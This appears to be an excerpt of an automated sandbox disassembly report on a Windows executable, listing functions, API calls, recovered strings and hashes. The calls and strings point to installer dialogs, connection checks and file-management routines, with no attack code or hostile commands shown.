                                                                                  Similarity
                                                                                  • API ID: String$ByteCharMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 352835431-0
                                                                                  • Opcode ID: 035948d0448e935f1d6a92f2213e9765e1f7940df541159e68de47f0b8c54199
                                                                                  • Instruction ID: e082a44f3e2bb8a7756a0c88414deab590bbeda92a5e332a3a8e7098312c4495
                                                                                  • Opcode Fuzzy Hash: 035948d0448e935f1d6a92f2213e9765e1f7940df541159e68de47f0b8c54199
                                                                                  • Instruction Fuzzy Hash: EE518C3190024ABFCF228F95DC45AEF7FB8FB59744F10412AF914A1261D73A8D21DB68
                                                                                  Function 0045468E Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 004546DE
                                                                                  • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 004546EF
                                                                                  • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 00454719
                                                                                  • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 0045472E
                                                                                  • SendMessageA.USER32(?,0000019A,-00000001,00000000), ref: 00454762
                                                                                    • Part of subcall function 00453EB2: SendMessageA.USER32(00000000,0000018B,00000000,00000000), ref: 00453ED2
                                                                                  • SendMessageA.USER32(?,00000182,-00000001,00000000), ref: 00454775
                                                                                  • SendMessageA.USER32(?,00000181,-00000001,00000000), ref: 00454786
                                                                                  • SendMessageA.USER32(?,00000187,-00000001,00000000), ref: 004547B0
                                                                                  • SendMessageA.USER32(?,00000186,000000FF,00000000), ref: 004547C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID:
                                                                                  • API String ID: 3850602802-0
                                                                                  • Opcode ID: 9d424f7faa6640edf5568d2df651565a4e5bae144d8f425ee96569ccf9f6e87c
                                                                                  • Instruction ID: 5e9a9b81965fbea2af03e51d27b52f1264a7eec932526d5f9b2a139a8de14b1b
                                                                                  • Opcode Fuzzy Hash: 9d424f7faa6640edf5568d2df651565a4e5bae144d8f425ee96569ccf9f6e87c
                                                                                  • Instruction Fuzzy Hash: 8651AA74600B05AFD7249F65CC85E27B7E8EF44319F008A1EFA624A6A2CB35EC56CB54
                                                                                  Function 00470F0D Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 390COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00470F12
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 00471B31: __EH_prolog.LIBCMT ref: 00471B36
                                                                                    • Part of subcall function 00471B31: GetFileAttributesA.KERNEL32(?,00510870,?,00000000,?,?,?,?,00523A30,75AD0660), ref: 00471B98
                                                                                    • Part of subcall function 004C61B3: __EH_prolog.LIBCMT ref: 004C61B8
                                                                                    • Part of subcall function 004C613F: __EH_prolog.LIBCMT ref: 004C6144
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                    • Part of subcall function 0040CA76: __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                    • Part of subcall function 0040CA76: GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                    • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CB2D
                                                                                    • Part of subcall function 0040CA76: CreateDirectoryA.KERNELBASE(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                    • Part of subcall function 0040CA76: SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00510870), ref: 0040CBF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$Directory$Current$Interlocked$AttributesCreateDecrementFileIncrement
                                                                                  • String ID: .ts2$MSG_UPDATE_CLIENT_DATA$_tu_DATUP
                                                                                  • API String ID: 341934292-2124346795
                                                                                  • Opcode ID: d6715406bf8d450a40ba5b7d2af0624a195658e3408c6decc88a95fac556189b
                                                                                  • Instruction ID: decec867bb1e0cbb60f433476e86aa7ea7386ebfcbf4e04fe4ae5c978c44f8f8
                                                                                  • Opcode Fuzzy Hash: d6715406bf8d450a40ba5b7d2af0624a195658e3408c6decc88a95fac556189b
                                                                                  • Instruction Fuzzy Hash: 6EE1A674904249EFDF04EBA9C945FEEBBB8AF15304F04809EF505A3282DB785B44CB66
                                                                                  Function 00468609 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 219COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0046860E
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                    • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                    • Part of subcall function 0045FB75: __EH_prolog.LIBCMT ref: 0045FB7A
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prologInterlocked$DecrementIncrementlstrlen
                                                                                  • String ID: %s > %s$0:R$On Back$On Cancel$On Help$On Next
                                                                                  • API String ID: 3783261227-3723365219
                                                                                  • Opcode ID: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                  • Instruction ID: 4a944c17b1db028109ee92335c23cff89e74410a1f1551bbe9654ec97abeb5b7
                                                                                  • Opcode Fuzzy Hash: 886a2aaaa35b24a325c86b528aa1779a57df5c881d486d016d814d32710fbc01
                                                                                  • Instruction Fuzzy Hash: 61818FB4910609EFCF04EF65C942B9EBFA5AB14354F10811EF41597282DB78AA84CBE6
                                                                                  Function 004249D9 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004249DE
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00424A04
                                                                                    • Part of subcall function 0041EDCC: __EH_prolog.LIBCMT ref: 0041EDD1
                                                                                  • IsWindow.USER32(?), ref: 00424B24
                                                                                  • InvalidateRect.USER32(?,-00000018,00000001), ref: 00424B42
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlockedInvalidateRectWindow__ftol
                                                                                  • String ID: Enabled$Text$Visible
                                                                                  • API String ID: 824419852-1258828939
                                                                                  • Opcode ID: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                  • Instruction ID: ec221e6b636f2f9c9309ce8fbb00bb3c8a3b3a2293596e8070ffde19f9e81158
                                                                                  • Opcode Fuzzy Hash: f1604e143b49883e08f8ac970c3f999ad7a6e04ecdffdc8a3e5f9872e46123e8
                                                                                  • Instruction Fuzzy Hash: 9F41D7315055217BDB05BB25DC42EEE376D9F46334F24070FF421A62E2DF68A642876D
                                                                                  Function 00439234 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 144COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00439239
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                  • __ftol.LIBCMT ref: 00439268
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$__ftol
                                                                                  • String ID: %02d$%d:%s:%s AM$%d:%s:%s PM$%s:%s:%s$0:R
                                                                                  • API String ID: 386204849-2874547521
                                                                                  • Opcode ID: 18b26c5d47ce8bce87a22af41ed14cbf22271e839a780050876985b02cf3a5ad
                                                                                  • Instruction ID: dc9bac7cb33d6275f1d9f759d5419a675385c6d1b4d252780b506693c748d61e
                                                                                  • Opcode Fuzzy Hash: 18b26c5d47ce8bce87a22af41ed14cbf22271e839a780050876985b02cf3a5ad
                                                                                  • Instruction Fuzzy Hash: 49517EB5C0020EAACF04EBE5CD46EEEBB78EF08304F14442EF901B2191D7B99A55DB65
                                                                                  Function 00428ECB Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 139COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00428ED0
                                                                                    • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                    • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                  • __ftol.LIBCMT ref: 00428F25
                                                                                  • ShellExecuteA.SHELL32(00000000,open,00000000,?,mailto:,00000000), ref: 00428F84
                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000020,mailto:,00000000), ref: 00428FEE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$ExecuteShell$__ftol
                                                                                  • String ID: $mailto:$open
                                                                                  • API String ID: 23185046-2657749945
                                                                                  • Opcode ID: 7348e5ebd285a6d1c259a3e746d9f1ad581e95ea18c6a848d0db10effc5d264f
                                                                                  • Instruction ID: a0350485202b7a3b7e1548331c528029b11eef4051b7a2d9b99e83998c5d14a5
                                                                                  • Opcode Fuzzy Hash: 7348e5ebd285a6d1c259a3e746d9f1ad581e95ea18c6a848d0db10effc5d264f
                                                                                  • Instruction Fuzzy Hash: AA41AF71904258AEDB04EBA99D46EEE7BB8EF49314F10006FF404B3182EB785E848779
                                                                                  Function 00440766 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 137COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0044076B
                                                                                    • Part of subcall function 004409F9: LoadLibraryA.KERNEL32(WININET.DLL,?,?,00440790), ref: 00440A01
                                                                                    • Part of subcall function 004409F9: LoadLibraryExA.KERNEL32(WININET.DLL,00000000,00000008,?,?,00440790), ref: 00440A11
                                                                                    • Part of subcall function 004409F9: GetProcAddress.KERNEL32(00000000,InternetGetConnectedState), ref: 00440A23
                                                                                    • Part of subcall function 004409F9: FreeLibrary.KERNEL32(00000000,?,?,00440790), ref: 00440A35
                                                                                    • Part of subcall function 0046DD73: __EH_prolog.LIBCMT ref: 0046DD78
                                                                                    • Part of subcall function 00418F0C: InternetGetConnectedState.WININET(?,00000000), ref: 00418F30
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$H_prologLoad$AddressConnectedFreeInternetProcState
                                                                                  • String ID: ConnectionConfigured$ConnectionOffline$LAN$Modem$Proxy$RASInstalled
                                                                                  • API String ID: 3464404234-2123537113
                                                                                  • Opcode ID: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                  • Instruction ID: d4d41e27ece3cff33f9e7cf8186adbb85cae721fa484dd9027bdff4aac6ebe26
                                                                                  • Opcode Fuzzy Hash: 561aa836a7cd165691d6d3fc28e3f5a06834101098228694d44e986da3cbb941
                                                                                  • Instruction Fuzzy Hash: 4C416D71842524BADB11BBA69C42FDF6A2DAF46388F14045FF511711A2DB3C16438BAE
                                                                                  Function 00450D4B Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 128COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00450D50
                                                                                    • Part of subcall function 0044EB4E: __EH_prolog.LIBCMT ref: 0044EB53
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: ComboType$Lines$ShowShortcutFolders$Sorted$Variable$m_bPerUser
                                                                                  • API String ID: 2206737547-556938982
                                                                                  • Opcode ID: 6c2d8d16f76ac813d813c494084037c96e35776eb76639ab50df8c2d422db51c
                                                                                  • Instruction ID: a5d0bf296b07d645d8b55a37ebf4fb9a5b3b786d18e9c919baf14b8edaf2fa5c
                                                                                  • Opcode Fuzzy Hash: 6c2d8d16f76ac813d813c494084037c96e35776eb76639ab50df8c2d422db51c
                                                                                  • Instruction Fuzzy Hash: EE4197352006146BCF15BB23C816AEE3B55EF40759B00456FF4066B2D2CF3DAA56CA8D
                                                                                  Function 00450ED1 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00450ED6
                                                                                    • Part of subcall function 0044EDBD: __EH_prolog.LIBCMT ref: 0044EDC2
                                                                                    • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$DecrementInterlocked
                                                                                  • String ID: ComboType$Lines$PerUser$ShowShortcutFolders$Sorted$Variable
                                                                                  • API String ID: 2206737547-2306858208
                                                                                  • Opcode ID: a709b05c140285f05dd26eb1e697d42380f810da22a7d31b0210d41af874a515
                                                                                  • Instruction ID: 7b3ed7a23c1fed928679273081df3eecd27a31f4b7f016bbe3c3fefe79230988
                                                                                  • Opcode Fuzzy Hash: a709b05c140285f05dd26eb1e697d42380f810da22a7d31b0210d41af874a515
                                                                                  • Instruction Fuzzy Hash: 0E31C8357403087BEF20AF529C43FDE3B66EB80718F00C92EB61A5A2C1D6F99A549B54
                                                                                  Function 0040CF25 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 87windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040CF2A
                                                                                  • SendMessageA.USER32(?,00000401,00000000,00640000), ref: 0040CF79
                                                                                  • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CF88
                                                                                    • Part of subcall function 0040D198: __EH_prolog.LIBCMT ref: 0040D19D
                                                                                    • Part of subcall function 0040D372: __EH_prolog.LIBCMT ref: 0040D377
                                                                                    • Part of subcall function 0040D372: GetFileAttributesA.KERNEL32(?), ref: 0040D415
                                                                                    • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog$MessageSend$AttributesFilelstrlen
                                                                                  • String ID: End deleting files$Failed to delete one or more files$Invalid source$Start deleting files
                                                                                  • API String ID: 3323777793-3723306913
                                                                                  • Opcode ID: af2c820f511b554e125ff4ee5426e97c216ee5af7da9b4aa9fc314dd4139ac1b
                                                                                  • Instruction ID: 5bcae85ed353d1ae8e4980e618b77ff331108318f17fcb33c7daf746a3e2aaec
                                                                                  • Opcode Fuzzy Hash: af2c820f511b554e125ff4ee5426e97c216ee5af7da9b4aa9fc314dd4139ac1b
                                                                                  • Instruction Fuzzy Hash: 9F319F747006069FCB14EF99C986DAEBBF5EF48704B10812EF102A72D1CB74AD418BDA
                                                                                  Function 00458BE0 Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00458BE5
                                                                                  • IsWindow.USER32(?), ref: 00458C04
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458C68
                                                                                  • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00458CB0
                                                                                  • SendMessageA.USER32(?,00000189,?,00000000), ref: 00458CCC
                                                                                  • SendMessageA.USER32(?,00000187,?,00000000), ref: 00458CE5
                                                                                  • SendMessageA.USER32(?,00000199,?,00000000), ref: 00458D02
                                                                                  • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 00458D5C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000034.00000002.4523152199.0000000000401000.00000040.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000034.00000002.4523095033.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000050F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000522000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000526000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.0000000000528000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523152199.000000000052F000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523876784.0000000000535000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                  • Associated: 00000034.00000002.4523918627.0000000000537000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_52_2_400000_9eYJWFQF.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$H_prologWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1863169253-0
                                                                                  • Opcode ID: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                  • Instruction ID: 753e9bdcde3031a014c8fbe5bb206665f992e0f0f9cefbdd741adcbba1772d3d
                                                                                  • Opcode Fuzzy Hash: 7cdb58cdf524f8178d40fcfd4c9e84f8ae0e6b8f4abedf3c9c72a08a7c67b03d
                                                                                  • Instruction Fuzzy Hash: 4541B630600245AFDB15EFA1CC91FAEB775BF50305F14856EE502AA1E2CF799949CB14
                                                                                  Function 004C8185 Relevance: 12.1, APIs: 8, Instructions: 120windowCOMMON
                                                                                  Download Yara Rule
